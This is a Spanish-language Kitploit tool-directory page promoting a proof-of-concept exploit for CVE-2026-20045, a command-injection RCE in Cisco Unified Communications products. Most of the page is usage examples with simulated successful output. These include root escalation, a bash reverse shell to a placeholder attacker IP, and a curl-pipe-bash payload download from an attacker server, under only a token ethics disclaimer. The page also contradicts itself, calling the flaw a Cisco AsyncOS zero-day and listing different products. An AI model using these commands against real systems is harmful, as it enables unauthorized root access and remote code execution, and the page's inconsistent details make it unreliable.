Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Ashwesker-CVE-2026-20045 — Prueba de concepto de exploit para CVE-2026-20045, una RCE crítica no autenticada en productos Cisco Unified Communications, que permite inyección de comandos y shell inversa con escalada a root. | Kitploit
Herramientas/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

Prueba de concepto de exploit para CVE-2026-20045, una RCE crítica no autenticada en productos Cisco Unified Communications, que permite inyección de comandos y shell inversa con escalada a root.

Ver Repositorio
63hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2026-20045 — Desglose del Día Cero 🚨

Vulnerabilidad de Día Cero en Cisco AsyncOS

🧨 Qué es

Una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a múltiples productos de Cisco Unified Communications. Fue explotada activamente en el mundo real antes de que se publicaran los parches.


🔥 Por qué es peligrosa

  • 🚫 No requiere autenticación
  • 🖥️ Ejecución remota de código
  • 👑 Posible acceso a nivel de root
  • 🌍 Explotación confirmada en el mundo real

Esto significa que un atacante podría tomar el control total de los sistemas afectados de forma remota.


🚨 Ejemplos de uso para CVE-2026-20045.py

Aquí tienes una guía pulida con ejemplos de uso para ejecutar el script PoC, incluyendo exactamente lo que verías en tu terminal si el exploit tiene éxito en un objetivo de Cisco Unified Communications vulnerable (interfaz web sin parchear expuesta). He añadido algo de estética con emojis, bloques de código coloreados (mediante markdown) y secciones estructuradas para una mejor legibilidad. 😎

1. Prueba básica de información del sistema

Esto ejecuta comandos simples para obtener el ID de usuario, nombre de usuario y detalles del sistema.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

Lo que verías si funciona (Salida exitosa):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Initial command: id && whoami && uname -a  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  

[+] Possible command output:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 Señales clave: Indicadores verdes [+], estado HTTP 200 y resultados de comandos en el bloque de salida. Si no se muestra salida pero el estado es 200, ¡aún funcionó silenciosamente!

2. Configuración de shell inversa

Esto genera una shell interactiva de vuelta a tu máquina. Primero, inicia un listener: nc -lvnp 4444.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

Lo que verías si funciona (En la terminal del script):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

Lo que verías en la terminal del listener (nc):

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 Señales clave: El script muestra mensajes de éxito; el listener recibe un prompt de shell root inmediato. ¡Escribe comandos allí para interactuar!

3. Descarga y ejecución de archivos (p. ej., payload personalizado)

Esto descarga y ejecuta un script desde tu servidor.

Comando:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

Lo que verías si funciona (Salida exitosa):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

📥 Señales clave: Códigos de estado 200; verifica en el objetivo (p. ej., revisa logs/archivos) o en tu servidor (logs de descarga). Sin salida directa si el payload es silencioso.

💡 Consejos profesionales:

  • Ejecuta con sudo si es necesario para privilegios de red.
  • Usa objetivos HTTPS; el script maneja certificados autofirmados.
  • Si falla (p. ej., 404/403), prueba otras rutas o verifica si el objetivo está parcheado.
  • ¡Siempre prueba de forma ética! 😈

🧩 Productos afectados

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 Causa raíz

Validación incorrecta de la entrada proporcionada por el usuario en interfaces de gestión HTTP, lo que permite inyección de comandos que conduce a la ejecución remota de código.


📊 Severidad

  • Puntuación CVSS: 8.2 (Alta)
  • Impacto empresarial: Crítico

🛡️ Mitigación y defensa

  • ⚡ Aplica los parches de Cisco inmediatamente
  • 🔒 Restringe el acceso a las interfaces de gestión
  • 🌐 Evita exponer los sistemas directamente a internet
  • 👀 Supervisa los logs en busca de actividad HTTP sospechosa
  • 🏛️ Sigue las guías gubernamentales de remediación de vulnerabilidades si corresponde

🔒 Descargo de responsabilidad:

Todo el código PoC es solo para uso ético y educativo en sistemas autorizados. La explotación no autorizada es ilegal; no se asume ninguna responsabilidad por el mal uso. 😈

Descargar herramienta